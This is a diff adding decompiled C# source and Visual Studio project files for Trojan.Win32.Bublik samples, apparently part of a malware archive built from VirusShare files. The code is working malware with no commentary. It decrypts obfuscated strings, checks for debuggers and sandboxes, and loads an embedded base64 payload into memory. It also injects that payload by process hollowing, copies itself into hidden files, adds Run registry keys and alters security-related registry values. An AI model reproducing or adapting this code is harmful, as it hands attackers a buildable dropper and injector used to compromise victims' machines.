@@ -0,0 +1,101 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: server2, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A78406EB-6936-436A-BB47-86E06CAA33E0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3.exe
using System.Collections.Generic;
using System.IO;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Text;
internal static class \u0008
{
private static readonly Dictionary<int, string> \u0002 = new Dictionary<int, string>(47);
private static BinaryReader \u0003;
private static byte[] \u0005;
private static short \u0008;
private static bool \u0006;
private static byte[] \u000E;
private static bool \u000F;
[MethodImpl(MethodImplOptions.NoInlining)]
internal static string \u0002(int _param0)
{
if (\u0008.\u000F)
{
string str;
\u0008.\u0002.TryGetValue(_param0, out str);
return str;
}
lock (\u0008.\u0002)
{
string str1;
if (\u0008.\u0002.TryGetValue(_param0, out str1))
return str1;
if (\u0008.\u0003 == null)
{
Assembly executingAssembly = Assembly.GetExecutingAssembly();
\u0008.\u0006 = false;
\u0008.\u0003 = new BinaryReader(executingAssembly.GetManifestResourceStream(" \u200B \u200B"));
short count = (short) ((int) \u0008.\u0003.ReadInt16() ^ -12299);
if (count == (short) 0)
\u0008.\u0008 = (short) ((int) \u0008.\u0003.ReadInt16() ^ -23699);
else
\u0008.\u0005 = \u0008.\u0003.ReadBytes((int) count);
\u0008.\u000E = executingAssembly.GetName().GetPublicKeyToken();
if (\u0008.\u000E != null && \u0008.\u000E.Length == 0)
\u0008.\u000E = (byte[]) null;
}
int num1 = _param0 ^ -626735467;
\u0008.\u0003.BaseStream.Position = (long) num1;
byte[] numArray;
if (\u0008.\u0005 != null)
{
numArray = \u0008.\u0005;
}
else
{
short count = \u0008.\u0008 != (short) -1 ? \u0008.\u0008 : (short) ((int) \u0008.\u0003.ReadInt16() ^ -7342 ^ num1);
numArray = count != (short) 0 ? \u0008.\u0003.ReadBytes((int) count) : (byte[]) null;
}
int count1 = \u0008.\u0003.ReadInt32() ^ num1 ^ 347177531;
bool flag = (count1 & int.MinValue) != 0;
if (flag)
count1 &= int.MaxValue;
byte[] bytes = \u0006.\u0002(numArray, \u0008.\u0003.ReadBytes(count1));
if (\u0008.\u000E != null != \u0008.\u0006)
{
for (int index = 0; index < count1; ++index)
{
byte num2 = \u0008.\u000E[index & 7];
byte num3 = (byte) ((int) num2 << 3 | (int) num2 >> 5);
bytes[index] = (byte) ((uint) bytes[index] ^ (uint) num3);
}
}
string str2;
if (flag && !\u0008.\u0006)
{
char[] chArray = new char[count1];
for (int index = 0; index < count1; ++index)
chArray[index] = (char) bytes[index];
str2 = new string(chArray);
}
else
str2 = Encoding.Unicode.GetString(bytes, 0, bytes.Length);
if (\u0008.\u0006)
str2 = (_param0 + count1 ^ 936568).ToString("X");
string str3 = string.Intern(str2);
\u0008.\u0002.Add(_param0, str3);
if (\u0008.\u0002.Count == 47)
{
\u0008.\u0003.Close();
\u0008.\u0003 = (BinaryReader) null;
\u0008.\u0005 = \u0008.\u000E = (byte[]) null;
\u0008.\u000F = true;
}
return str3;
}
}
}
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3/file
+1
View File
File diff suppressed because one or more lines are too long
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3/    ​    ​ 
BIN
View File
Binary file not shown.
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-cf5e1776e9eeb1557410fefc8efb45a4c2a1d1845c07d90cb4cecda231a6dcb7/AssemblyInfo.cs
+5
View File
@@ -0,0 +1,5 @@
using System.Reflection;
using System.Runtime.CompilerServices;
[assembly: SuppressIldasm]
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-cf5e1776e9eeb1557410fefc8efb45a4c2a1d1845c07d90cb4cecda231a6dcb7/Trojan.Win32.Bublik.elhu.csproj
+48
View File
@@ -0,0 +1,48 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-cf5e1776e9eeb1557410fefc8efb45a4c2a1d1845c07d90cb4cecda231a6dcb7.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{C1C5F67F-3BFE-4BDB-90B6-4C79AA740E3B}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>kev1</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="_0002.cs" />
<Compile Include="_0003.cs" />
<Compile Include="_0005.cs" />
<Compile Include="_0006.cs" />
<Compile Include="_0008.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="" />
<EmbeddedResource Include="file" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-cf5e1776e9eeb1557410fefc8efb45a4c2a1d1845c07d90cb4cecda231a6dcb7/Trojan.Win32.Bublik.elhu.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "kev1", "Trojan.Win32.Bublik.elhu-cf5e1776e9eeb1557410fefc8efb45a4c2a1d1845c07d90cb4cecda231a6dcb7.csproj", "{C1C5F67F-3BFE-4BDB-90B6-4C79AA740E3B}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{C1C5F67F-3BFE-4BDB-90B6-4C79AA740E3B}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{C1C5F67F-3BFE-4BDB-90B6-4C79AA740E3B}.Debug|Any CPU.Build.0 = Debug|Any CPU
{C1C5F67F-3BFE-4BDB-90B6-4C79AA740E3B}.Release|Any CPU.ActiveCfg = Release|Any CPU
{C1C5F67F-3BFE-4BDB-90B6-4C79AA740E3B}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-cf5e1776e9eeb1557410fefc8efb45a4c2a1d1845c07d90cb4cecda231a6dcb7/_0002.cs
+457
View File
@@ -0,0 +1,457 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: kev1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 5B707792-F182-4802-BE95-B43026E8F1CF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-cf5e1776e9eeb1557410fefc8efb45a4c2a1d1845c07d90cb4cecda231a6dcb7.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Threading;
using System.Windows.Forms;
internal sealed class \u0002
{
private static \u0003 \u0002 = new \u0003();
private static string \u0003 = \u0008.\u0002(-665676900);
private static string \u0005 = \u0008.\u0002(-665676900);
private static byte[] \u0008 = new byte[7]
{
(byte) 98,
(byte) 87,
(byte) 76,
(byte) 65,
(byte) 54,
(byte) 43,
(byte) 32
};
private static byte[] \u0006;
private static bool \u000E = false;
private static bool \u000F = false;
private static bool \u0002\u2000 = true;
private static bool \u0003\u2000 = false;
private static bool \u0005\u2000 = false;
private static bool \u0008\u2000 = false;
private static bool \u0006\u2000 = false;
private static bool \u000E\u2000 = true;
private static bool \u000F\u2000 = false;
private static bool \u0002\u2001 = false;
private static bool \u0003\u2001 = true;
private static bool \u0005\u2001 = false;
private static bool \u0008\u2001 = false;
private static bool \u0006\u2001 = false;
private static bool \u000E\u2001 = false;
private static bool \u000F\u2001 = false;
private static string \u0002\u2002 = \u0008.\u0002(-665676875);
private static string \u0003\u2002 = \u0008.\u0002(-665676839);
private static bool \u0005\u2002 = false;
private static bool \u0008\u2002 = false;
private static bool \u0006\u2002 = false;
private static bool \u000E\u2002 = false;
private static bool \u000F\u2002 = false;
private static bool \u0002\u2003 = true;
private static string \u0003\u2003 = \u0008.\u0002(-665676861);
private static bool \u0005\u2003 = false;
private static bool \u0008\u2003 = false;
private static int \u0006\u2003 = 0;
private static ThreadStart \u000E\u2003;
private static bool \u0002(string _param0) => Process.GetProcessesByName(_param0).Length > 0;
private static void \u0002(string _param0, string _param1)
{
int num = (int) MessageBox.Show(_param0, _param1, MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
private static void \u0002() => Console.Write(\u0008.\u0002(-665677671));
private static void \u0002(string[] _param0)
{
if (!(\u0002.\u0003 == \u0002.\u0005))
return;
\u0002.\u0002();
if (\u0002.\u000F\u2001)
{
try
{
if (\u0002.\u000E\u2003 == null)
\u0002.\u000E\u2003 = new ThreadStart(\u0002.\u0005);
new Thread(\u0002.\u000E\u2003).Start();
}
catch
{
}
}
\u0002.\u0002();
if (\u0002.\u000E)
{
try
{
if (Debugger.IsAttached)
return;
}
catch
{
}
}
if (\u0002.\u000F)
{
try
{
long ticks = DateTime.Now.Ticks;
Thread.Sleep(10);
if (DateTime.Now.Ticks - ticks < 10L)
return;
}
catch
{
}
}
if (\u0002.\u0002\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-665677682)))
return;
}
catch
{
}
}
if (\u0002.\u0003\u2000)
{
try
{
Form form = new Form();
form.Text = \u0008.\u0002(-665677636);
form.Opacity = 0.0;
form.ShowInTaskbar = false;
form.Show();
if (form.Text == \u0008.\u0002(-665677647))
return;
form.Close();
}
catch
{
}
}
if (\u0002.\u0005\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-665677662)))
return;
}
catch
{
}
}
if (\u0002.\u0008\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-665677616)))
return;
}
catch
{
}
}
if (\u0002.\u0006\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-665677626)))
return;
}
catch
{
}
}
if (\u0002.\u000E\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-665677579)))
return;
}
catch
{
}
}
if (\u0002.\u000F\u2000)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-665677586)))
return;
}
catch
{
}
}
if (\u0002.\u0002\u2001)
{
try
{
if (\u0002.\u0002(\u0008.\u0002(-665677795)))
return;
}
catch
{
}
}
\u0002.\u0002();
if (\u0002.\u0008\u2003)
{
try
{
Thread.Sleep(\u0002.\u0006\u2003 * 1000);
}
catch
{
}
}
\u0002.\u0002();
try
{
Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(\u0008.\u0002(-665677805));
\u0002.\u0002();
StreamReader streamReader = new StreamReader(manifestResourceStream);
string end = streamReader.ReadToEnd();
\u0002.\u0002();
streamReader.Close();
\u0002.\u0006 = Convert.FromBase64String(end);
try
{
\u0002.\u0002();
Thread thread = new Thread(new ThreadStart(\u0002.\u0003));
\u0002.\u0002();
thread.Start();
\u0002.\u0002();
}
catch
{
}
}
catch
{
}
\u0002.\u0002();
if (\u0002.\u0005\u2002)
{
try
{
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677820), true).SetValue(\u0008.\u0002(-665677754), (object) \u0008.\u0002(-665677714), RegistryValueKind.DWord);
}
catch
{
}
try
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-665677722));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677402), (object) \u0008.\u0002(-665677714), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677402), (object) \u0008.\u0002(-665677714), RegistryValueKind.DWord);
Registry.LocalMachine.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677402), (object) \u0008.\u0002(-665677714), RegistryValueKind.DWord);
}
catch
{
}
if (\u0002.\u0008\u2002)
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677354)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-665677354));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677354), true).SetValue(\u0008.\u0002(-665677343), (object) \u0008.\u0002(-665677552), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677354), true).SetValue(\u0008.\u0002(-665677343), (object) \u0008.\u0002(-665677552), RegistryValueKind.DWord);
}
if (\u0002.\u0006\u2002)
{
try
{
new Process()
{
StartInfo = {
FileName = \u0008.\u0002(-665677560),
Arguments = \u0008.\u0002(-665677508),
UseShellExecute = false,
CreateNoWindow = true
}
}.Start();
}
catch
{
}
}
if (\u0002.\u000E\u2002)
{
try
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-665677722));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677491), (object) \u0008.\u0002(-665677450), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677491), (object) \u0008.\u0002(-665677450), RegistryValueKind.DWord);
}
catch
{
}
}
if (\u0002.\u000F\u2002)
{
try
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-665677722));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677458), (object) \u0008.\u0002(-665677450), RegistryValueKind.DWord);
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677722), true).SetValue(\u0008.\u0002(-665677458), (object) \u0008.\u0002(-665677450), RegistryValueKind.DWord);
}
catch
{
}
}
}
\u0002.\u0002();
if (\u0002.\u0002\u2003)
{
try
{
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677820), true).SetValue(\u0008.\u0002(-665677163), (object) \u0008.\u0002(-665677552), RegistryValueKind.DWord);
}
catch
{
}
try
{
FileStream fileStream1 = new FileStream(Process.GetCurrentProcess().MainModule.FileName, FileMode.Open, FileAccess.Read);
byte[] buffer = new byte[fileStream1.Length];
fileStream1.Read(buffer, 0, buffer.Length);
fileStream1.Close();
FileStream fileStream2 = new FileStream(Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003, FileMode.Create);
fileStream2.Write(buffer, 0, buffer.Length);
fileStream2.Close();
fileStream2.Dispose();
FileStream fileStream3 = new FileStream(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003, FileMode.Create);
fileStream3.Write(buffer, 0, buffer.Length);
fileStream3.Close();
fileStream3.Dispose();
File.SetAttributes(Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003, FileAttributes.Hidden);
File.SetAttributes(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003, FileAttributes.Hidden);
}
catch
{
}
try
{
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677131), true).SetValue(\u0008.\u0002(-665677119), (object) (Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003));
Registry.LocalMachine.OpenSubKey(\u0008.\u0002(-665677131), true).SetValue(\u0008.\u0002(-665677119), (object) (Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003));
}
catch
{
}
if (\u0002.\u0005\u2002)
{
try
{
if (Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677073)) == null)
{
Registry.CurrentUser.CreateSubKey(\u0008.\u0002(-665677073));
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677073), true).SetValue(\u0008.\u0002(-665677119), (object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003));
}
else
Registry.CurrentUser.OpenSubKey(\u0008.\u0002(-665677073), true).SetValue(\u0008.\u0002(-665677119), (object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0008.\u0002(-665677123) + \u0002.\u0003\u2003));
}
catch
{
}
}
}
\u0002.\u0002();
if (!\u0002.\u0005\u2003)
return;
try
{
if (Application.ExecutablePath.Contains(Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176))))
return;
string str = \u0008.\u0002(-665677275) + (object) '"' + Environment.GetCommandLineArgs()[0] + (object) '"' + \u0008.\u0002(-665677226) + (object) '"' + Path.GetFileName(Application.ExecutablePath) + (object) '"' + \u0008.\u0002(-665677247);
TextWriter textWriter = (TextWriter) new StreamWriter(Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677198));
textWriter.WriteLine(str);
textWriter.Close();
new Process()
{
StartInfo = {
FileName = (Environment.GetEnvironmentVariable(\u0008.\u0002(-665677176)) + \u0008.\u0002(-665677198)),
UseShellExecute = false,
CreateNoWindow = true
}
}.Start();
}
catch
{
}
}
public static void \u0003()
{
try
{
\u0002.\u0002();
Assembly assembly = Assembly.Load(\u0002.\u0006);
MethodInfo entryPoint = assembly.EntryPoint;
\u0002.\u0002();
entryPoint.Invoke(RuntimeHelpers.GetObjectValue(assembly.CreateInstance(entryPoint.Name)), new object[1]
{
(object) new string[0]
});
}
catch
{
try
{
\u0002.\u0002();
Assembly assembly = Assembly.Load(\u0002.\u0006);
MethodInfo entryPoint = assembly.EntryPoint;
\u0002.\u0002();
entryPoint.Invoke(RuntimeHelpers.GetObjectValue(assembly.CreateInstance(entryPoint.Name)), new object[0]);
}
catch
{
try
{
\u0002.\u0002();
MethodInfo entryPoint = Assembly.Load(\u0002.\u0006).EntryPoint;
\u0002.\u0002();
entryPoint.Invoke((object) null, (object[]) null);
}
catch
{
try
{
\u0002.\u0002();
\u0002.\u0002.\u0002(\u0002.\u0006, string.Empty, Application.ExecutablePath);
\u0002.\u0002();
}
catch
{
}
}
}
}
}
private static void \u0005() => \u0002.\u0002(\u0002.\u0002\u2002, \u0002.\u0003\u2002);
}
MSIL/Trojan/Win32/B/Trojan.Win32.Bublik.elhu-cf5e1776e9eeb1557410fefc8efb45a4c2a1d1845c07d90cb4cecda231a6dcb7/_0003.cs
+310
View File
@@ -0,0 +1,310 @@
// Decompiled with JetBrains decompiler
// Type: 
// Assembly: kev1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 5B707792-F182-4802-BE95-B43026E8F1CF
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-cf5e1776e9eeb1557410fefc8efb45a4c2a1d1845c07d90cb4cecda231a6dcb7.exe
using System;
using System.Runtime.InteropServices;
internal sealed class \u0003
{
private void \u0002() => Console.Write(\u0008.\u0002(-665677671));
[DllImport("kernel32")]
private static extern IntPtr GetProcAddress(IntPtr _param0, string _param1);
[DllImport("kernel32")]
private static extern IntPtr LoadLibrary(string _param0);
public void \u0002(byte[] _param1, string _param2, string _param3)
{
\u0003.\u0002\u2001 obj1 = new \u0003.\u0002\u2001();
\u0003.\u0006\u2001 obj2 = new \u0003.\u0006\u2001();
this.\u0002();
\u0003.\u0002\u2002 structure1 = new \u0003.\u0002\u2002();
\u0003.\u0006\u2000 structure2 = new \u0003.\u0006\u2000();
this.\u0002();
\u0003.\u000E\u2000 obj3 = new \u0003.\u000E\u2000();
\u0003.\u000F\u2001 obj4 = new \u0003.\u000F\u2001();
this.\u0002();
structure2.\u0002 = (uint) Marshal.SizeOf((object) structure2);
obj4.\u0002 = 65543U;
this.\u0002();
GCHandle gcHandle = GCHandle.Alloc((object) _param1, GCHandleType.Pinned);
int int32 = gcHandle.AddrOfPinnedObject().ToInt32();
this.\u0002();
gcHandle.Free();
\u0003.\u0002\u2001 structure3 = (\u0003.\u0002\u2001) Marshal.PtrToStructure((IntPtr) int32, typeof (\u0003.\u0002\u2001));
this.\u0002();
\u0003.\u0006\u2001 structure4 = (\u0003.\u0006\u2001) Marshal.PtrToStructure((IntPtr) (int32 + structure3.\u0006\u2001), typeof (\u0003.\u0006\u2001));
this.\u0002();
if (structure4.\u0002 != 17744U || structure3.\u0002 != (ushort) 23117)
return;
\u0003.\u0002 forFunctionPointer1 = (\u0003.\u0002) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-665676824)), \u0008.\u0002(-665677035)), typeof (\u0003.\u0002));
\u0003.\u0005 forFunctionPointer2 = (\u0003.\u0005) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-665677056)), \u0008.\u0002(-665677008)), typeof (\u0003.\u0005));
\u0003.\u0008 forFunctionPointer3 = (\u0003.\u0008) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-665676824)), \u0008.\u0002(-665676971)), typeof (\u0003.\u0008));
this.\u0002();
\u0003.\u0003 forFunctionPointer4 = (\u0003.\u0003) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-665676824)), \u0008.\u0002(-665676992)), typeof (\u0003.\u0003));
\u0003.\u0006 forFunctionPointer5 = (\u0003.\u0006) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-665676824)), \u0008.\u0002(-665676949)), typeof (\u0003.\u0006));
\u0003.\u000E forFunctionPointer6 = (\u0003.\u000E) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-665676824)), \u0008.\u0002(-665676656)), typeof (\u0003.\u000E));
this.\u0002();
\u0003.\u000F forFunctionPointer7 = (\u0003.\u000F) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-665676824)), \u0008.\u0002(-665676615)), typeof (\u0003.\u000F));
this.\u0002();
int num1 = forFunctionPointer1(_param3, _param2, IntPtr.Zero, IntPtr.Zero, false, (\u0003.\u0002\u2000) 4, IntPtr.Zero, (string) null, ref structure2, out obj3) ? 1 : 0;
int num2 = forFunctionPointer2(obj3.\u0002, (IntPtr) (long) structure4.\u0005.\u0005\u2000) ? 1 : 0;
this.\u0002();
if (!forFunctionPointer3(obj3.\u0002, (IntPtr) (long) structure4.\u0005.\u0005\u2000, structure4.\u0005.\u000E\u2001, (\u0003.\u0008\u2000) 12288, (\u0003.\u0005\u2000) 64))
return;
int num3 = forFunctionPointer4(obj3.\u0002, (IntPtr) (long) structure4.\u0005.\u0005\u2000, _param1, structure4.\u0005.\u000F\u2001, (object) null) ? 1 : 0;
this.\u0002();
for (int index1 = 0; index1 <= (int) structure4.\u0003.\u0003 - 1; ++index1)
{
structure1 = (\u0003.\u0002\u2002) Marshal.PtrToStructure((IntPtr) (int32 + structure3.\u0006\u2001 + Marshal.SizeOf((object) structure4) + Marshal.SizeOf((object) structure1) * index1), typeof (\u0003.\u0002\u2002));
byte[] numArray = new byte[(IntPtr) structure1.\u0008];
for (int index2 = 0; index2 <= (int) structure1.\u0008 - 1; ++index2)
numArray[index2] = _param1[(long) structure1.\u0006 + (long) index2];
this.\u0002();
int num4 = forFunctionPointer4(obj3.\u0002, (IntPtr) (long) (structure4.\u0005.\u0005\u2000 + structure1.\u0005), numArray, structure1.\u0008, (object) null) ? 1 : 0;
}
int num5 = forFunctionPointer5(obj3.\u0003, ref obj4) ? 1 : 0;
this.\u0002();
byte[] bytes = BitConverter.GetBytes(structure4.\u0005.\u0005\u2000);
int num6 = forFunctionPointer4(obj3.\u0002, (IntPtr) (long) (obj4.\u0002\u2001 + 8U), bytes, (uint) bytes.Length, (object) null) ? 1 : 0;
obj4.\u0008\u2001 = structure4.\u0005.\u0005\u2000 + structure4.\u0005.\u000F;
this.\u0002();
int num7 = forFunctionPointer6(obj3.\u0003, ref obj4) ? 1 : 0;
int num8 = (int) forFunctionPointer7(obj3.\u0003);
}
private delegate bool \u0002(
string _param1,
string _param2,
IntPtr _param3,
IntPtr _param4,
bool _param5,
\u0003.\u0002\u2000 _param6,
IntPtr _param7,
string _param8,
ref \u0003.\u0006\u2000 _param9,
out \u0003.\u000E\u2000 _param10);
private delegate bool \u0003(
IntPtr _param1,
IntPtr _param2,
byte[] _param3,
uint _param4,
object _param5);
private delegate bool \u0005(IntPtr _param1, IntPtr _param2);
private delegate bool \u0006(IntPtr _param1, ref \u0003.\u000F\u2001 _param2);
private delegate bool \u0008(
IntPtr _param1,
IntPtr _param2,
uint _param3,
\u0003.\u0008\u2000 _param4,
\u0003.\u0005\u2000 _param5);
private delegate bool \u000E(IntPtr _param1, [In] ref \u0003.\u000F\u2001 _param2);
private delegate uint \u000F(IntPtr _param1);
private enum \u0002\u2000 : uint
{
}
private struct \u0002\u2002
{
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
public byte[] \u0002;
public uint \u0003;
public uint \u0005;
public uint \u0008;
public uint \u0006;
public uint \u000E;
public uint \u000F;
public ushort \u0002\u2000;
public ushort \u0003\u2000;
public uint \u0005\u2000;
}
private enum \u0003\u2000 : uint
{
}
private enum \u0005\u2000 : uint
{
}
private struct \u0006\u2000
{
public uint \u0002;
public string \u0003;
public string \u0005;
public string \u0008;
public uint \u0006;
public uint \u000E;
public uint \u000F;
public uint \u0002\u2000;
public uint \u0003\u2000;
public uint \u0005\u2000;
public uint \u0008\u2000;
public uint \u0006\u2000;
public short \u000E\u2000;
public short \u000F\u2000;
public IntPtr \u0002\u2001;
public IntPtr \u0003\u2001;
public IntPtr \u0005\u2001;
public IntPtr \u0008\u2001;
}
private enum \u0008\u2000 : uint
{
}
private struct \u000E\u2000
{
public IntPtr \u0002;
public IntPtr \u0003;
public uint \u0005;
public uint \u0008;
}
private struct \u000F\u2000
{
public int \u0002;
public IntPtr \u0003;
public bool \u0005;
}
private struct \u0002\u2001
{
public ushort \u0002;
public ushort \u0003;
public ushort \u0005;
public ushort \u0008;
public ushort \u0006;
public ushort \u000E;
public ushort \u000F;
public ushort \u0002\u2000;
public ushort \u0003\u2000;
public ushort \u0005\u2000;
public ushort \u0008\u2000;
public ushort \u0006\u2000;
public ushort \u000E\u2000;
public ushort \u000F\u2000;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
public ushort[] \u0002\u2001;
public ushort \u0003\u2001;
public ushort \u0005\u2001;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
public ushort[] \u0008\u2001;
public int \u0006\u2001;
}
private struct \u0003\u2001
{
public ushort \u0002;
public ushort \u0003;
public uint \u0005;
public uint \u0008;
public uint \u0006;
public ushort \u000E;
public ushort \u000F;
}
private struct \u0005\u2001
{
public uint \u0002;
public uint \u0003;
}
private struct \u0006\u2001
{
public uint \u0002;
public \u0003.\u0003\u2001 \u0003;
public \u0003.\u0008\u2001 \u0005;
}
private struct \u0008\u2001
{
public ushort \u0002;
public byte \u0003;
public byte \u0005;
public uint \u0008;
public uint \u0006;
public uint \u000E;
public uint \u000F;
public uint \u0002\u2000;
public uint \u0003\u2000;
public uint \u0005\u2000;
public uint \u0008\u2000;
public uint \u0006\u2000;
public ushort \u000E\u2000;
public ushort \u000F\u2000;
public ushort \u0002\u2001;
public ushort \u0003\u2001;
public ushort \u0005\u2001;
public ushort \u0008\u2001;
public uint \u0006\u2001;
public uint \u000E\u2001;
public uint \u000F\u2001;
public uint \u0002\u2002;
public ushort \u0003\u2002;
public ushort \u0005\u2002;
public uint \u0008\u2002;
public uint \u0006\u2002;
public uint \u000E\u2002;
public uint \u000F\u2002;
public uint \u0002\u2003;
public uint \u0003\u2003;
